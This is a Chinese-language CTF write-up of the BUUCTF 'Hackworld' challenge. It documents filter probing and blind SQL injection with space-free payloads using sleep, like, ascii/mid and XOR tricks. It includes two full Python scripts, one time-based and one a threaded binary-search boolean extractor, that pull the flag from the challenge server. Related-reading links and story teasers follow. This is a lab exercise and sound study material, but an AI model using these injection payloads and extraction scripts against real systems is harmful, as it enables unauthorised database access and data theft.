BUUCTF Hackworld

首先用sqlmap跑一跑没有结果
尝试输入,测试注入点和过滤

1'  bool(false) 
1'# SQL Injection Checked.
1'%23  bool(false) 
1' %23  Injection Checked.
1%23  Hello, glzjin wants a girlfriend.

可以发现,只要被过滤了就会显示SQL Injection Checked,通过测试
过滤了and&&、 or||、 空格 、# 、for、limit

明显的注入,但是过滤空格,*,%23%0a,limit,for等等,明显的盲注
通过测试sleep((select(flag)from(flag)where(flag)like('f%'))like('f%'))可以成功延时,构造脚本
过滤空格,*,%23%0a,limit,for
后面再回头想了一下,flag表就一条数据,不能用limit也不需要用like构造的这么复杂,可以构造sleep(ascii(mid((select(flag)from(flag)),1,1))=102)
然后看glzjin师傅的wp却是布尔型盲注
1^(cot(ascii(mid((select(flag)from(flag)),1,1))=102))^1
其中的cot函数的作用是求余切值,会得到0.6这样,最后通过异或和四舍五入最后为1(我也不是很懂为什么一定要cot)

这里讲一下like

例子
我们希望从上面的 "Persons" 表中选取居住在以 "N" 开始的城市里的人:
我们可以使用下面的 SELECT 语句:
SELECT * FROM Persons
WHERE City LIKE 'N%'
提示:"%" 可用于定义通配符(模式中缺少的字母)。
sqlmap中也有用like代替=


图片.png

图片.png

代码

import requests
def six_six_six(url):
    flag = ''
    while True:
        for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_':
            data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)}
            print(data)
            try:
                requests.post(url=url,data=data,timeout=1)
            except:
                flag=flag+i
                print('[*]%s'%flag)
                break
        if i=='}':
            break
    print('[+]%s'%flag)

url = 'http://web43.buuoj.cn'
six_six_six(url)

还可以通过布尔盲注进行,有两种返回结果

-1=(ascii(substr((select    flag    from    flag),1,1))>120)

我比较菜鸡,一开始怎么也看不出这个脚本的意思,经过一波测试

-1=(158=58) 返回Hello, glzjin wants a girlfriend.
-1=(58=58)返回Error Occured When Fetch Result.
-1=(158>58)返回Error Occured When Fetch Result.
-1=(158<58) 返回Hello, glzjin wants a girlfriend.
还是不太懂为什么这么构造,
这里可以揣摩出大概意思是()里的判断为true返回Error Occured When Fetch Result.(也就是flase);
()里的判断为flase返回Hello, glzjin wants a girlfriend.也就是id=1查询出的内容(也就是true)
原因是-1=flase,返回1?
-1=true,返回flase?
这样看来确实没有必要用and和or了

上脚本

import requests, threading
z = {}
def fast(n):
    R, L = 126, 30
    m = 0
    while R >= L:
        m = (R + L) // 2
        #payload = '-1=(ascii(substr((select    flag    from    flag),{0},1))>{1})'.format(n, m)
        payload = '-1=(ascii(mid((select(flag)from(flag)),{0},1))>{1})'.format(n, m)
        data = {"id": payload}

        if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
            payload = '-1=(ascii(substr((select flag    from    flag),{0},1))={1})'.format(n, m + 1)
            data = {"id": payload}
        #如果不返回Hello, glzjin wants a girlfriend,语句为真,ascii(flag[n])>m,构造判断ascii(flag[n])=m+1?
            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
                z[n] = chr(m + 1)
                print(chr(m + 1))
                break
            #如果不返回Hello, glzjin wants a girlfriend,语句为真,返回flag[n],break,跳出
            L = m + 1#直到R>L,这里L每次增加到m+1,二分法
            print(m)

        else:
            payload = '-1=(ascii(substr((select flag    from    flag),{0},1))={1})'.format(n, m - 1)
            data = {"id": payload}
            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
                z[n] = chr(m - 1)
                print(chr(m - 1))
                break
            R = m - 1


a = []#创建threads数组a[]
for x in range(1, 39):#这里的39需要自己测试,从小到大测试
    a.append(threading.Thread(target=fast, args=(x,)))#创建线程,使用threading.Thread()方法,在这个方法中调用fast方法target=fast,args方法对fast进行传参。 把创建好的线程装到threads数组a[]中。
for x in a:
    x.start()#最后通过for循环遍历线程数组。
for x in a:
    x.join()#join()的作用是,在子线程完成运行之前,这个子线程的父线程将一直被阻塞。注意:  join()方法的位置是在for循环外的,也就是说必须等待for循环里的两个进程都结束后,才去执行主进程。
f = ''
for x in range(1, 39):
    f += z[x]
print(f)
print('ok')

参考文章
http://118.25.174.93/index.php/archives/694/#Hack%20World
http://cdusec.happyhacking.top/?post=78

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,390评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,821评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,632评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,170评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,033评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,098评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,511评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,204评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,479评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,572评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,341评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,213评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,576评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,893评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,171评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,486评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,676评论 2 335

推荐阅读更多精彩内容

  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,009评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,199评论 2 22
  • DVWA实践 Web漏洞原理 1. DVWA环境搭建 Warmpserver+DVWA 2. Brute Forc...
    JasonChiu17阅读 3,718评论 0 19
  • SQLMAP作用 判断可注入的参数 判断可以用哪种SQL注入技术来注入 识别出哪种数据库 根据用户选择,读取哪些数...
    陆洒脱阅读 3,709评论 1 4
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,784评论 0 9